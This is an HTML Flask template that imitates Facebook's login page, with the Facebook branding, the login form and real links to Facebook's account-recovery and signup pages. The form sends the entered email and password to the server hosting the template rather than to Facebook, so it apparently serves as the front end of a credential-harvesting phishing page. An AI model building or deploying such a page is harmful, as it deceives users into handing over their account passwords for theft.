<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook — log in or sign up</title>

    <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='css/style.css') }}">
</head>

<body>
    <div class="container">
        <section class="intro-section">
            <h1>facebook</h1>

            <p>Connect with friends and the world around you on Facebook.</p>
        </section>

        <section class="signin-section">
            <div>
                <form method="post">
                    <div>
                        <input type="text" placeholder="Email address or phone number" name="email">
                    </div>

                    <div>
                        <input type="text" placeholder="Password" name="pass">
                    </div>

                    <div>
                        <button type="submit">Log in</button>
                    </div>

                    <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgotten password?</a>

                    <hr />

                    <div class="create-btn">
                        <a href="https://www.facebook.com/r.php?entry_point=login">
                            <button type="button">Create new account</button>
                        </a>
                    </div>
                </form>


            </div>


            <p>
                <a href="https://www.facebook.com/pages/create/?ref_type=registration_form"><strong>
                        Create a Page
                    </strong></a> for a celebrity, brand or business.
            </p>
        </section>
    </div>
</body>

</html>